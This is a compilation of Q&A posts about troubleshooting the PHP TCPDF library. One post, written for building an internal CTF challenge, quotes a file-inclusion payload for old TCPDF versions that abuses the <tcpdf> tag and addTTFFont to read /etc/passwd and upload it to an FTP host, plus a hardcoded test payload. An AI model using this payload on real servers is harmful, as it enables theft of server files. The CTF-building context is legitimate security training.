I have a PHP project in which I use TCPDF. I had a PHP File which creates an HTML theme with bootstrap. Inside this file I include my pdfGeneration.php. It looks like that:
require_once('tcpdf/tcpdf.php');
$pdfAuthor = "Test";
$pdfName = "Test.pdf";
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);
$pdf->SetCreator(PDF_CREATOR);
$pdf->SetAuthor($pdfAuthor);
$pdf->SetTitle($pdfName);
$pdf->SetSubject($pdfName);
$pdf->setHeaderFont(Array(PDF_FONT_NAME_MAIN, '', PDF_FONT_SIZE_MAIN));
$pdf->setFooterFont(Array(PDF_FONT_NAME_DATA, '', PDF_FONT_SIZE_DATA));
$pdf->SetDefaultMonospacedFont(PDF_FONT_MONOSPACED);
$pdf->SetMargins(PDF_MARGIN_LEFT, PDF_MARGIN_TOP, PDF_MARGIN_RIGHT);
$pdf->SetHeaderMargin(PDF_MARGIN_HEADER);
$pdf->SetFooterMargin(PDF_MARGIN_FOOTER);
$pdf->SetAutoPageBreak(TRUE, PDF_MARGIN_BOTTOM);
$pdf->setImageScale(PDF_IMAGE_SCALE_RATIO);
$pdf->SetFont('dejavusans', '', 10);
$pdf->AddPage();
$htmlContent = 'Test';
$pdf->writeHTML($htmlContent, true, false, true, false, '');
ob_end_clean();
$outputFile = 'myServerPathHere';
$pdf->Output($outputFile, 'F');
echo '<span>PDF Creation finished. <a href="' . $outputFilePath . pdfName'" target='blank'>You can download the file here</a></span>';
If I don't include this pdfGeneration everything works fine. But when I include it I got only a blank white site with that span in it as a result. The rest of the HTML code that is located inside the file that includes the pdfGeneration is totally lost. I can't find an error?!
My goal is a site where the pdf is generated and in the best case, the pdf is directly opened in a new tab. I don't find a solution for that so I solved it with the link. But my first problem is the missing HTML.
Excuse my question, I found the error myself. The function "ob_end_clean(); " is the error. PHP Docs: ob_end_clean - Clean (erase) the output buffer and turn off output buffering. This probably causes the entire previously generated HTML code to be lost. If I remove the command it works.
Related
I am making some challenges as part of an internal CTF that we are hosting. As part of the challenges, one of the things that I was planning on giving out was File Inclusion using a vulnerability in a certain version of TCPDF.
I was trying to follow the blog here to get an understanding of the bug itself:
File inclusion through broken TCPDF
I do understand the vulnerability in a nutshell, which is, that TCPDF, by default, has access to a special tag <tcpdf /> which allows execution of available TCPDF methods along with parameters.
So for example if :
<tcpdf method="some_method" params="abcd"/>
the above is passed to the writeHTML() TCPDF would call some_method() with the params abcd.
And to be able to read files, a specific TCPDF method called addTTFFont is going to be used which takes as params the following:
$fontfile – The file to grab from the server. Any readable file can
be selected.
$fonttype – Needs to be set to TrueType for the attack to work.
$outpath – Location for the output for the file.
By injecting a ftp-location, as the 3rd param, the file will be uploaded remotely.
Please correct me if my understanding is incorrect here.
Now, here's what I do not understand from the blog above. The line that says:
By generating a tcpdf-element using the following code:
$params = TCPDF_STATIC::serializeTCPDFtagParameters(array('/etc/passwd','TrueType','',255,urldecode('ftp://user:pass#host/')));
Now what is the author trying to explain in the above line ?
Also to be able to reproduce this vulnerability, here's what I tried :
Hosted a very simple (and of course vulnerable in many ways) app on my local Aapache server and used TCPDF V 6.1.1 as this was the version immediately before 6.2.0 in which the bug was patched.
The app simply allows users to register and login. On login user gets a page as and on clicking on the link in red, a PDF file is generated for the user with his name as :
where gogo was the user name.
Now below is the code that generates the PDF (gen_pdf.php):
<?php
session_start();
require_once('tcpdf_include.php');
if (isset($_SESSION['username'])){
// Extend the TCPDF class to create custom Header and Footer
class MYPDF extends TCPDF {
//Page header
public function Header() {
// Logo
$image_file = K_PATH_IMAGES.'logo_example.jpg';
$this->Image($image_file, 10, 10, 15, '', 'JPG', '', 'T', false, 300, '', false, false, 0, false, false, false);
// Set font
$this->SetFont('helvetica', 'B', 20);
// Title to right allignment
$this->Cell(0, 15, '<< The Machine v/s Samaritan >>', 1, false, '', 0, '', 0, false, 'T', 'M');
}
}
$pdf = new MYPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);
$pdf->SetCreator(PDF_CREATOR);
$pdf->SetAuthor('John Reese');
$pdf->SetTitle('The Machine Must Live');
$pdf->SetSubject('The future is inevitable. ');
$pdf->SetKeywords('The Machine, Samaritan, Mr. Reese');
// set default header data
$pdf->SetHeaderData(PDF_HEADER_LOGO, PDF_HEADER_LOGO_WIDTH, PDF_HEADER_TITLE.' 001', PDF_HEADER_STRING, array(0,64,255), array(0,64,128));
$pdf->setFooterData(array(0,64,0), array(0,64,128));
// set header and footer fonts
$pdf->setHeaderFont(Array(PDF_FONT_NAME_MAIN, '', PDF_FONT_SIZE_MAIN));
$pdf->setFooterFont(Array(PDF_FONT_NAME_DATA, '', PDF_FONT_SIZE_DATA));
// set default monospaced font
$pdf->SetDefaultMonospacedFont(PDF_FONT_MONOSPACED);
// set margins
$pdf->SetMargins(PDF_MARGIN_LEFT, PDF_MARGIN_TOP, PDF_MARGIN_RIGHT);
$pdf->SetHeaderMargin(PDF_MARGIN_HEADER);
$pdf->SetFooterMargin(PDF_MARGIN_FOOTER);
// set auto page breaks
$pdf->SetAutoPageBreak(TRUE, PDF_MARGIN_BOTTOM);
// set image scale factor
$pdf->setImageScale(PDF_IMAGE_SCALE_RATIO);
// set some language-dependent strings (optional)
if (#file_exists(dirname(__FILE__).'/lang/eng.php')) {
require_once(dirname(__FILE__).'/lang/eng.php');
$pdf->setLanguageArray($l);
}
// ---------------------------------------------------------
// set default font subsetting mode
$pdf->setFontSubsetting(true);
// Set font
// dejavusans is a UTF-8 Unicode font, if you only need to
// print standard ASCII chars, you can use core fonts like
// helvetica or times to reduce file size.
$pdf->SetFont('dejavusans', '', 14, '', true);
// set text shadow effect
$pdf->setTextShadow(array('enabled'=>true, 'depth_w'=>0.2, 'depth_h'=>0.2, 'color'=>array(196,196,196), 'opacity'=>1, 'blend_mode'=>'Normal'));
// Set some content to print
$html = <<<EOD
<div>
<h1>Welcome to Tomorrow !!<span style="color:black;"></span></h1>
<i>This Machine is growing weaker and we need to keep it safe.</i>
<p>This is the world of the <i>Samaritan</i> and it needs to be protected <i>Mr. Rees and Root will be there for your help</i>.</p>
<p>All the best for your travel ... </p>
</div>
EOD;
$pdf->AddPage('P');
$html = $html."<div><h2>".$_SESSION['username']."</h2></div>";
$pdf->writeHTML($html);
ob_end_clean();
$pdf->Output('ticket_to_the_future.pdf', 'I');
}
?>
I modified just this part of the above code :
$pdf->AddPage('P');
$html = $html."<div><h2>".$_SESSION['username']."</h2></div>";
$pdf->writeHTML($html);
ob_end_clean();
$pdf->Output('ticket_to_the_future.pdf', 'I');
to this:
$pdf->AddPage('P');
$html = "<tcpdf method=\"addTTFFont\" params=\"%5B%22CHANGELOG.TXT%22%2C%22TrueType%22%2C%22%22%2C255%2C%22%5C%2Ftmp%5C%2Ftcpdf_bug.txt%22%5D\"/>";
$pdf->writeHTML($html);
ob_end_clean();
$pdf->Output('ticket_to_the_future.pdf', 'I');
that is hardcoded the exploit payload (just to check if things are working), where CHANGELOG.TXT is a file already present in the same directory as gen_pdf.php
Output
No tcpdf_bug.txt file seems to be getting generated in \tmp.
What am I doing wrong here ? Please help me create this PoC.
I have issue with PDF generated from CKEditor.
I have some text typed in CKEditor:
HTML source:
Next, this text is saved in DB.
My CKEditor config looks like:
Further, above text is fetched from DB in controller, and PDF file is generated using TCPDF:
public function createRegulationPDF(){
require_once('TCPDF/tcpdf.php');
// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);
// set document information
$pdf->SetCreator(PDF_CREATOR);
$pdf->SetPrintHeader(false);
$pdf->SetPrintFooter(false);
// set default monospaced font
$pdf->SetDefaultMonospacedFont(PDF_FONT_MONOSPACED);
// set image scale factor
$pdf->setImageScale(PDF_IMAGE_SCALE_RATIO);
// set font
$pdf->SetFont('freeserif', '', 10);
// add a page
$pdf->AddPage();
// GET CONTENT FROM DB
$html = $this->view->settings['reg_statement'];
// output the HTML content
$pdf->writeHTML($html, true, false, true, false, '');
....
And the final point, generated PDF:
The question is: what is this weird (the box) selected char?
And how to avoid it?
I have a script taken from TCPDF examples I am trying to out put it to another folder but I am unable to. I have tried searching stackoverflow and have used the examples here but it doesnt seem to work for me. I have also tried it on my server and still the same error. I have tried placing the folder in the TCPDF folder also to see if it was path issue.
below is a the sample from Their website
<?php
require_once('tcpdf_include.php');
// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);
// set document information
$pdf->SetCreator(PDF_CREATOR);
$pdf->SetAuthor('Nicola Asuni');
$pdf->SetTitle('TCPDF Example 001');
$pdf->SetSubject('TCPDF Tutorial');
$pdf->SetKeywords('TCPDF, PDF, example, test, guide');
// set default header data
$pdf->SetHeaderData(PDF_HEADER_LOGO, PDF_HEADER_LOGO_WIDTH, PDF_HEADER_TITLE.' 001', PDF_HEADER_STRING, array(0,64,255), array(0,64,128));
$pdf->setFooterData(array(0,64,0), array(0,64,128));
// set header and footer fonts
$pdf->setHeaderFont(Array(PDF_FONT_NAME_MAIN, '', PDF_FONT_SIZE_MAIN));
$pdf->setFooterFont(Array(PDF_FONT_NAME_DATA, '', PDF_FONT_SIZE_DATA));
// set default monospaced font
$pdf->SetDefaultMonospacedFont(PDF_FONT_MONOSPACED);
// set margins
$pdf->SetMargins(PDF_MARGIN_LEFT, PDF_MARGIN_TOP, PDF_MARGIN_RIGHT);
$pdf->SetHeaderMargin(PDF_MARGIN_HEADER);
$pdf->SetFooterMargin(PDF_MARGIN_FOOTER);
// set auto page breaks
$pdf->SetAutoPageBreak(TRUE, PDF_MARGIN_BOTTOM);
// set image scale factor
$pdf->setImageScale(PDF_IMAGE_SCALE_RATIO);
// set some language-dependent strings (optional)
if (#file_exists(dirname(__FILE__).'/lang/eng.php')) {
require_once(dirname(__FILE__).'/lang/eng.php');
$pdf->setLanguageArray($l);
}
// ---------------------------------------------------------
// set default font subsetting mode
$pdf->setFontSubsetting(true);
// Set font
// dejavusans is a UTF-8 Unicode font, if you only need to
// print standard ASCII chars, you can use core fonts like
// helvetica or times to reduce file size.
$pdf->SetFont('dejavusans', '', 14, '', true);
// Add a page
// This method has several options, check the source code documentation for more information.
$pdf->AddPage();
// set text shadow effect
$pdf->setTextShadow(array('enabled'=>true, 'depth_w'=>0.2, 'depth_h'=>0.2, 'color'=>array(196,196,196), 'opacity'=>1, 'blend_mode'=>'Normal'));
// Set some content to print
$pdf->Output('TestFolder/example_001.pdf', 'F');
?>
TCPDF ERROR: Unable to create output file:
Sounds like a simple rights issue to me.
Does the output folder exist?
Does your web server run as a different user to the folder where the site is hosted?
To provide a real solution, you need to provide more information about your web-server setup. Which web server do you use? Can you log in via a terminal?
I had rights issues too, after I installed TCPDF via composer. It still causes me issues every time I set set up new development environments.
TCPDF tries to write to its installation folder during execution. If that folder is not writable by your webserver, TCPDF will die.
Try:
su
chmod -R g+w vendor/tcpdf
chown -R owner:apache vendor/tcpdf
Substituting, of course, the folder, owner and apache values with the real values from your server.
make sure that your file('TestFolder/example_001.pdf') is not open anywhere when you run script. if it's open somewhere else then TCPDF can't open it.
I set up the main path for tcpdf like this:
define ('K_PATH_MAIN', '/MAMP/htdocs/tcpdf/');
and the url path like this:
define ('K_PATH_URL', 'http://localhost:8888/tcpdf/');
I'm using MAMP in mac. I'm receiving the follow error:
TCPDF ERROR: Could not include font definition file: helvetica
Looks like that the main path is wrong after all attempts I need help to put it right.
This is the follow code using, but the code is the example from tcpdf:
require_once('../config/lang/eng.php');
require_once('../tcpdf.php');
// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);
// set document information
$pdf->SetCreator(PDF_CREATOR);
$pdf->SetAuthor('Nicola Asuni');
$pdf->SetTitle('TCPDF Example 001');
$pdf->SetSubject('TCPDF Tutorial');
$pdf->SetKeywords('TCPDF, PDF, example, test, guide');
// set default header data
$pdf->SetHeaderData(PDF_HEADER_LOGO, PDF_HEADER_LOGO_WIDTH, PDF_HEADER_TITLE.' 001', PDF_HEADER_STRING);
// set header and footer fonts
$pdf->setHeaderFont(Array(PDF_FONT_NAME_MAIN, '', PDF_FONT_SIZE_MAIN));
$pdf->setFooterFont(Array(PDF_FONT_NAME_DATA, '', PDF_FONT_SIZE_DATA));
// set default monospaced font
$pdf->SetDefaultMonospacedFont(PDF_FONT_MONOSPACED);
//set margins
$pdf->SetMargins(PDF_MARGIN_LEFT, PDF_MARGIN_TOP, PDF_MARGIN_RIGHT);
$pdf->SetHeaderMargin(PDF_MARGIN_HEADER);
$pdf->SetFooterMargin(PDF_MARGIN_FOOTER);
//set auto page breaks
$pdf->SetAutoPageBreak(TRUE, PDF_MARGIN_BOTTOM);
//set image scale factor
$pdf->setImageScale(PDF_IMAGE_SCALE_RATIO);
//set some language-dependent strings
$pdf->setLanguageArray($l);
// ---------------------------------------------------------
// set default font subsetting mode
$pdf->setFontSubsetting(true);
// Set font
// dejavusans is a UTF-8 Unicode font, if you only need to
// print standard ASCII chars, you can use core fonts like
// helvetica or times to reduce file size.
$pdf->SetFont('dejavusans', '', 14, '', true);
// Add a page
// This method has several options, check the source code documentation for more information.
$pdf->AddPage();
// Set some content to print
$html = <<<EOD
<h1>Welcome to <span style="color:black;">TC</span><span style="color:white;">PDF</span> !</h1>
<i>This is the first example of TCPDF library.</i>
<p>This text is printed using the <i>writeHTMLCell()</i> method but you can also use: <i>Multicell(), writeHTML(), Write(), Cell() and Text()</i>.</p>
<p>Please check the source code documentation and other examples for further information.</p>
<p style="color:#CC0000;">TO IMPROVE AND EXPAND TCPDF I NEED YOUR SUPPORT, PLEASE MAKE A DONATION!</p>
EOD;
// Print text using writeHTMLCell()
$pdf->writeHTMLCell($w=0, $h=0, $x='', $y='', $html, $border=0, $ln=1, $fill=0, $reseth=true, $align='', $autopadding=true);
// ---------------------------------------------------------
// Close and output PDF document
// This method has several options, check the source code documentation for more information.
$pdf->Output('example_001.pdf', 'I');
Use this code in php
define ('K_PATH_FONTS',dirname(__FILE__).'/../fonts/');
I have been using TCPDF for sometime. It's simple to use, outputs low size PDF and is under active development.
Following is the code for a page which should only have Hello World and a footer showing page number. However I get an additional Horizontal Line at the top of the page.It's bugging me. How do I get rid of it?
<?php
require_once('config/lang/eng.php');
require_once('tcpdf.php');
// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);
// set document information
$pdf->SetCreator(PDF_CREATOR);
// set default header data
// set header and footer fonts
$pdf->setHeaderFont(Array(PDF_FONT_NAME_MAIN, '', PDF_FONT_SIZE_MAIN));
$pdf->setFooterFont(Array(PDF_FONT_NAME_DATA, '', PDF_FONT_SIZE_DATA));
// set default monospaced font
$pdf->SetDefaultMonospacedFont(PDF_FONT_MONOSPACED);
//set margins
//$pdf->SetMargins(PDF_MARGIN_LEFT, PDF_MARGIN_TOP, PDF_MARGIN_RIGHT);
//$pdf->SetHeaderMargin(PDF_MARGIN_HEADER);
$pdf->SetFooterMargin(PDF_MARGIN_FOOTER);//if i comment this out the lower line disappears
//set auto page breaks
$pdf->SetAutoPageBreak(TRUE, PDF_MARGIN_BOTTOM);
//set image scale factor
//$pdf->setImageScale(PDF_IMAGE_SCALE_RATIO);
//set some language-dependent strings
$pdf->setLanguageArray($l);
// ---------------------------------------------------------
// set font
$pdf->SetFont('helvetica', '', 10);
// add a page
$pdf->AddPage();
// define some HTML content with style
$html = <<<EOF
Hello World
EOF;
// output the HTML content
$pdf->writeHTML($html, true, false, true, false, '');
// reset pointer to the last page
$pdf->lastPage();
// ---------------------------------------------------------
//Close and output PDF document
$pdf->Output('example_061.pdf', 'I');
?>
Solution:
$pdf->SetPrintHeader(false);
$pdf->SetPrintFooter(false);
Changing or eliminating Header & Footer in TCPDF
just do this $pdf->setPrintHeader(false); and the line at the top will go away
The horizontal line is defined on the default Header().
You can either override the Header() method as on example n. 3 or disable the header as on the example n. 2.
Check the TCPDF website at http://www.tcpdf.org and consult the official forum for further information.
In case this is not solved for anyone else here and they are using FPDI to import a template, try looking at the calculated page height from FPDI and the resultant page height from TCPDF. For me they did not match, and to get rid of the black line I had to add 8 to the page height, and subtract 7 from the y-ordinate value in the useTemplate function in addition to setPrintHeader(false), like this:
$tplidx = $pdf->ImportPage($i);
$s = $pdf->getTemplateSize($tplidx);
// TCPDF STUFF, AddPage(), etc.
$pdf->useTemplate($tplidx,0,-7,$s['w'],$s['h']+8);